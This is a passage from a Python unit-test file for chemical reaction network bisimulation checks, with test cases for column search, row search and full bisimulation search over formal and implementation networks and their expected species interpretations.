'i394': ['X', 'X', 'Y'],
'i575': ['X'],
'i599': ['C'],
'i631': [],
'i778': ['Y'],
'i842': ['Y', 'X', 'A'],
'i886': [],
'i969': [],
'i1457': [],
'i2232': ['A'],
'i2300': ['A', 'C'],
'i2340': [],
'i2392': [],
'i3032': []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
#passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
#assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestColumnSearch(unittest.TestCase):
def test_search_column_01(self):
fcrn = "A -> B + C"
icrn = """x1 -> x2
x2 -> x3 + x4
x3 <=> x5
x4 -> x7 + x8
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i1 = {'x2': ['A'], 'x3': ['B', 'C'], 'x4': []}
i2 = {'x2': ['A'], 'x3': ['B'], 'x4': ['C']}
i3 = {'x2': ['A'], 'x3': ['C'], 'x4': ['B']}
i4 = {'x2': ['A'], 'x3': [], 'x4': ['B', 'C']}
i5 = {'x4': ['A'], 'x7': ['B', 'C'], 'x8': []}
i6 = {'x4': ['A'], 'x7': ['B'], 'x8': ['C']}
i7 = {'x4': ['A'], 'x7': ['C'], 'x8': ['B']}
i8 = {'x4': ['A'], 'x7': [], 'x8': ['B', 'C']}
i9 = {'x1': ['A'], 'x2': ['B', 'C']}
cols = list(search_column(fcrn, icrn, fs))
if len(cols) != 9:
print('FAILURE:')
for e, b in enumerate(cols, 1):
print(e, b)
assert len(cols) == 9
assert i1 in cols
assert i2 in cols
assert i3 in cols
assert i4 in cols
assert i5 in cols
assert i6 in cols
assert i7 in cols
assert i8 in cols
assert i9 in cols
def test_search_column_02(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
cols = list(search_column(fcrn, icrn, fs))
# SB: I didn't actually check those, but you should if something goes wrong!
i01 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i02 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': []}
i03 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D']}
i04 = {'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D'], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i05 = {'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D'], 'x7': ['A', 'C'], 'x9': ['B']}
i06 = {'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': [], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i07 = {'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': [], 'x7': ['A', 'C'], 'x9': ['B', 'D']}
i08 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i09 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': []}
i10 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D']}
i11 = {'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D'], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i12 = {'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D'], 'x2': ['A', 'C'], 'x6': ['B']}
i13 = {'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': [], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i14 = {'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': [], 'x2': ['A', 'C'], 'x6': ['B', 'D']}
i15 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i16 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D']}
i17 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': []}
i18 = {'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': [], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i19 = {'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': [], 'x7': ['A', 'B'], 'x9': ['C', 'D']}
i20 = {'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D'], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i21 = {'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D'], 'x7': ['A', 'B'], 'x9': ['C']}
i22 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i23 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D']}
i24 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': []}
i25 = {'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': [], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i26 = {'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': [], 'x2': ['A', 'B'], 'x6': ['C', 'D']}
i27 = {'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D'], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i28 = {'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D'], 'x2': ['A', 'B'], 'x6': ['C']}
if len(cols) != 28:
print('FAILURE:')
for e, b in enumerate(cols, 1):
print(e, b)
assert len(cols) == 28
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestRowSearch(unittest.TestCase):
def test_search_row_01(self):
fcrn = "A -> B + C"
icrn = """x1 -> x2
x2 -> x3 + x4
x3 <=> x5
x4 -> x7 + x8
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i1 = {'x2': ['A'], 'x3': ['B', 'C'], 'x4': []}
rows = list(search_row(fcrn, icrn, fs, i1))
assert len(rows) == 0
i2 = {'x2': ['A'], 'x3': ['B'], 'x4': ['C']}
i2r01 = {'x1': ['A'], 'x2': ['A'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': ['C'], 'x8': []}
i2r02 = {'x1': ['A'], 'x2': ['A'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': [], 'x8': ['C']}
rows = list(search_row(fcrn, icrn, fs, i2))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i2r01 in rows
assert i2r02 in rows
i3 = {'x2': ['A'], 'x3': ['C'], 'x4': ['B']}
i3r01 = {'x1': ['A'], 'x2': ['A'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': [], 'x8': ['B']}
i3r02 = {'x1': ['A'], 'x2': ['A'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': ['B'], 'x8': []}
rows = list(search_row(fcrn, icrn, fs, i3))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i3r01 in rows
assert i3r02 in rows
i4 = {'x2': ['A'], 'x3': [], 'x4': ['B', 'C']}
i4r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
i4r02 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
rows = list(search_row(fcrn, icrn, fs, i4))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i4r01 in rows
assert i4r02 in rows
i5 = {'x4': ['A'], 'x7': ['B', 'C'], 'x8': []}
rows = list(search_row(fcrn, icrn, fs, i5))
assert len(rows) == 0
i6 = {'x4': ['A'], 'x7': ['B'], 'x8': ['C']}
i6r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['A'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
i6r02 = {'x1': ['A', 'B'], 'x2': ['A', 'B'], 'x3': ['B'], 'x4': ['A'], 'x5': ['B'], 'x7': ['B'], 'x8': ['C']}
i6r03 = {'x1': ['A', 'C'], 'x2': ['A', 'C'], 'x3': ['C'], 'x4': ['A'], 'x5': ['C'], 'x7': ['B'], 'x8': ['C']}
rows = list(search_row(fcrn, icrn, fs, i6))
if len(rows) != 3:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 3
assert i6r01 in rows
assert i6r02 in rows
assert i6r03 in rows
i7 = {'x4': ['A'], 'x7': ['C'], 'x8': ['B']}
i7r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['A'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
i7r02 = {'x1': ['A', 'B'], 'x2': ['A', 'B'], 'x3': ['B'], 'x4': ['A'], 'x5': ['B'], 'x7': ['C'], 'x8': ['B']}
i7r03 = {'x1': ['A', 'C'], 'x2': ['A', 'C'], 'x3': ['C'], 'x4': ['A'], 'x5': ['C'], 'x7': ['C'], 'x8': ['B']}
rows = list(search_row(fcrn, icrn, fs, i7))
if len(rows) != 3:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 3
assert i7r01 in rows
assert i7r02 in rows
assert i7r03 in rows
i8 = {'x4': ['A'], 'x7': [], 'x8': ['B', 'C']}
rows = list(search_row(fcrn, icrn, fs, i8))
assert len(rows) == 0
i9 = {'x1': ['A'], 'x2': ['B', 'C']}
i9r01 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': [], 'x8': ['B']}
i9r02 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': ['B'], 'x8': []}
i9r03 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': ['C'], 'x8': []}
i9r04 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': [], 'x8': ['C']}
i9r05 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
i9r06 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
i9r01 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': [], 'x8': ['B']}
i9r02 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': ['B'], 'x8': []}
rows = list(search_row(fcrn, icrn, fs, i9))
if len(rows) != 6:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 6
assert i9r01 in rows
assert i9r02 in rows
assert i9r03 in rows
assert i9r04 in rows
assert i9r05 in rows
assert i9r06 in rows
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestSearchSpace(unittest.TestCase):
def test_1f_1i(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D']}
i02 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D']}
i03 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C']}
i04 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 4
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
def test_1f_2i(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['C'], 'f': ['D']}
i02 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['D'], 'f': ['C']}
i03 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': [], 'f': ['C', 'D']}
i04 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['C', 'D'], 'f': []}
i05 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['C'], 'f': ['D']}
i06 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['D'], 'f': ['C']}
i07 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['C', 'D'], 'f': []}
i08 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': [], 'f': ['C', 'D']}
i09 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['C'], 'f': ['D']}
i10 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['D'], 'f': ['C']}
i11 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': [], 'f': ['C', 'D']}
i12 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['C', 'D'], 'f': []}
i13 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['C'], 'f': ['D']}
i14 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['D'], 'f': ['C']}
i15 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['C', 'D'], 'f': []}
i16 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': [], 'f': ['C', 'D']}
i17 = {'a': ['B'], 'b': ['A'], 'c': ['C', 'D'], 'd': [], 'e': ['C'], 'f': ['D']}
i18 = {'a': ['B'], 'b': ['A'], 'c': ['C', 'D'], 'd': [], 'e': ['D'], 'f': ['C']}
i19 = {'a': ['B'], 'b': ['A'], 'c': [], 'd': ['C', 'D'], 'e': ['C'], 'f': ['D']}
i20 = {'a': ['B'], 'b': ['A'], 'c': [], 'd': ['C', 'D'], 'e': ['D'], 'f': ['C']}
i21 = {'a': ['A'], 'b': ['B'], 'c': ['C', 'D'], 'd': [], 'e': ['C'], 'f': ['D']}
i22 = {'a': ['A'], 'b': ['B'], 'c': ['C', 'D'], 'd': [], 'e': ['D'], 'f': ['C']}
i23 = {'a': ['A'], 'b': ['B'], 'c': [], 'd': ['C', 'D'], 'e': ['C'], 'f': ['D']}
i24 = {'a': ['A'], 'b': ['B'], 'c': [], 'd': ['C', 'D'], 'e': ['D'], 'f': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 24:
print()
for e, b in enumerate(bisims, 1):
print(e, b, b in [i01, i02, i03, i04, i05, i06, i07, i08, i09, i10,
i11, i12, i13, i14, i15, i16, i17, i18, i19, i20, i21, i22, i23, i24])
assert len(bisims) == 24
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
assert i05 in bisims
assert i06 in bisims
assert i07 in bisims
assert i08 in bisims
assert i09 in bisims
assert i10 in bisims
assert i11 in bisims
assert i12 in bisims
assert i13 in bisims
assert i14 in bisims
assert i15 in bisims
assert i16 in bisims
assert i17 in bisims
assert i18 in bisims
assert i19 in bisims
assert i20 in bisims
assert i21 in bisims
assert i22 in bisims
assert i23 in bisims
assert i24 in bisims
def test_1f_3i(self):
fcrn = "A + B -> C + D"
icrn = "a + b <=> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
# does not pass permissive.
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 0
def test_2f_2i(self):
fcrn = "A + B -> C + D; C + D -> E + F"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['F'], 'f': ['E']}
i02 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['E'], 'f': ['F']}
i03 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['F'], 'f': ['E']}
i04 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['E'], 'f': ['F']}
i05 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['F'], 'f': ['E']}
i06 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['E'], 'f': ['F']}
i07 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['F'], 'f': ['E']}
i08 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['E'], 'f': ['F']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 8:
print()
for e, b in enumerate(bisims, 1):
print(e, {k:v for k, v in sorted(b.items())})
assert len(bisims) == 8
def test_order_formals_bug(self):
fcrn = "A + B -> C"
icrn = "B_1_ + i7 -> i684 + i17; A <=> i7; i17 -> C_1_ + i29"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': []}
i02 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
i03 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
i04 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
i05 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': ['C'], 'i17': [], 'i29': []}
i06 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': []}
i07 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
i08 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
i09 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
i10 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': ['C'], 'i17': [], 'i29': []}
# i8 and i9 are missing
#n11 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': []}
#n10 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': ['C'], 'i17': [], 'i29': []}
#n16 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': ['C'], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': []}
#n12 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
#n17 = {'A': ['A'], 'B_1_': ['B'], 'C_1_': [], 'i7': ['A'], 'i684': [], 'i17': ['A', 'B'], 'i29': ['C']}
#n13 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': ['C'], 'i17': [], 'i29': []}
#n14 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': ['C'], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': []}
#n15 = {'A': ['B'], 'B_1_': ['A'], 'C_1_': [], 'i7': ['B'], 'i684': [], 'i17': ['C'], 'i29': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
if len(bisims) != 10:
print()
for e, b in enumerate(bisims):
print(e, {k: v for k, v in sorted(b.items())})
assert len(bisims) == 10
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
assert i05 in bisims
assert i06 in bisims
assert i07 in bisims
assert i08 in bisims
assert i09 in bisims
assert i10 in bisims
def test_additional_formals(self):
fcrn = "A -> B"
icrn = "a -> b; c -> d"
fcrn, _ = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
fs = set(['A', 'B', 'C'])
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['C']}
i02 = {'a': ['C'], 'b': ['C'], 'c': ['A'], 'd': ['B']}
bisims = list(crn_bisimulations(fcrn, icrn, formals = fs))
if len(bisims) != 2:
for e, b in enumerate(bisims, 1):
print(f'{e} {b}')
assert i01 in bisims
assert i02 in bisims
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class FastBisimulationTests(unittest.TestCase):
def test_example_01(self):
# A sample test to aggree on a new interface for bisimulation.
fcrn = "A->B"
ecrn = "A<=>i19; i19<=>i39+X; i39->i71+i72"
fcrn, fs = parse_crn(fcrn)
ecrn, _ = parse_crn(ecrn)
partial = {sp: [sp] for sp in fs}
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertTrue(v)
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertTrue(v)
v, i = crn_bisimulation_test(fcrn, ecrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertTrue(v)
# A function that does not say so, should not modify its arguments.
self.assertDictEqual(partial, {sp: [sp] for sp in fs})
def test_example_02(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
# First correct interpretation
inter1 = {'x1': ['A', 'B'],
'x2': ['C', 'D'],
'x3': ['C'],
'x4': ['A'],
'x5': ['A', 'C'],
'x6': ['C'],
'x7': ['B', 'D'],
'x8': ['D'],
'x9': ['B'],
'x10': ['B']}
pinter1 = {'x7': ['B', 'D']}
# Second correct interpretation
inter2 = {'x1': ['A', 'C'],
'x2': ['B', 'D'],
'x3': ['B'],
'x4': ['A'],
'x5': ['A', 'B'],
'x6': ['B'],
'x7': ['C', 'D'],
'x8': ['D'],
'x9': ['C'],
'x10': ['C']}
pinter2 = {'x7': ['C', 'D']}
# CRN preprocessing
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
# Using partial inter1
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter1,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
# Using inter1
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
v, i1 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter1,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter1, i1)
# Using partial inter2
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'graphsearch')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'loopsearch')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
v, i2 = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = pinter2,
permissive = 'bruteforce')
self.assertTrue(v)
self.assertDictEqual(inter2, i2)
def test_example_02_false(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
v, _ = crn_bisimulation_test(fcrn, icrn, fs)
self.assertTrue(v)
# Test wrong partial interpretation
partial = {'x2': ['B', 'D']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertTrue(v)
partial['x3'] = ['C']
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'graphsearch')
self.assertFalse(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'loopsearch')
self.assertFalse(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial, permissive = 'bruteforce')
self.assertFalse(v)
def test_example_04(self):
# Two valid interpretations
fcrn = "B + B -> B"
icrn = "B <=> x1; B + x1 -> x2 + x3; x2 -> B + x4"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
ifull1 = {'B': ['B'],
'x1': ['B'],
'x2': ['B', 'B'],
'x3': [],
'x4': []}
ipart1 = {'B': ['B'],
'x2': ['B', 'B']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = ipart1)
self.assertTrue(v)
self.assertDictEqual(i1, ifull1)
ifull2 = {'B': ['B'],
'x1': ['B'],
'x2': ['B'],
'x3': [],
'x4': []}
ipart2 = {'B': ['B'],
'x2': ['B']}
v, i2 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = ipart2)
self.assertTrue(v)
self.assertDictEqual(i2, ifull2)
def test_example_05(self):
# Issue fixed: Naming species in certain ways broke bisimulation
fcrn = "A + C -> A + B"
icrn = """A <=> x1 + e45
C + x1 <=> x3 + x4
x3 -> A + B + x5"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A': ['A'],
'B': ['B'],
'C': ['C'],
'x1': ['A'],
'x3': ['A', 'C']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter)
self.assertTrue(v)
def test_garbage_collection(self):
# Garbage collection schemes do not produce a correct CRN bisimulation ...
fcrn = "A + B <=> X + Y"
icrn = """
A <=> i22
i59 <=> i139
i45 -> i351 + i352
i22 + B <=> i45 + i44
i44 <=> i60 + i59
i60 -> i104 + i105
i139 <=> i227 + X
i227 <=> i269 + Y
i269 -> i338 + i339
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A': ['A'],
'B': ['B'],
'X': ['X'],
'Y': ['Y'],
'i22': ['A'],
'i44': ['A', 'B'],
'i59': ['A', 'B'],
'i139': ['A', 'B'],
'i227': ['Y']}
v, i1 = crn_bisimulation_test(fcrn, icrn, fs, interpretation=inter)
assert not v
def test_QingDong_crn6_i02_gs_bf(self):
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_02 = {'i842': ['Y', 'X', 'A'],
'i394': ['X', 'Y', 'X'],
'i119': ['X', 'B', 'A'],
'i2300': ['A', 'C'],
'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_02,
permissive = 'graphsearch')
self.assertTrue(v)
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_02,
permissive = 'bruteforce')
self.assertTrue(v)
def test_wrong_init(self):
fcrn = " -> A "
icrn = """A_1_ + i8 <=>
i8 ->"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'A_1_' : ['A']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, inter)
assert v is False
def test_species_assignments(self):
# Uses soloveichik2010 translation scheme.
fcrn = "A + B -> B + B"
icrn = """A <=> i2
B_1_ + i5 <=> i43
B_1_ <=> i45
B_2_ + i5 <=> i49
B_2_ <=> i51
i2 <=> i3
i3 <=> i5
i5 + i5 <=> i7
i5 + i5 <=> i8
i5 + i25 <=> i28
i5 + i25 <=> i29
i5 <=> i10
i5 <=> i11
i7 <=> i8
i10 <=> i11
i25 <=> i31
i28 <=> i29
i31 -> B_1_ + i34
i34 -> B_2_
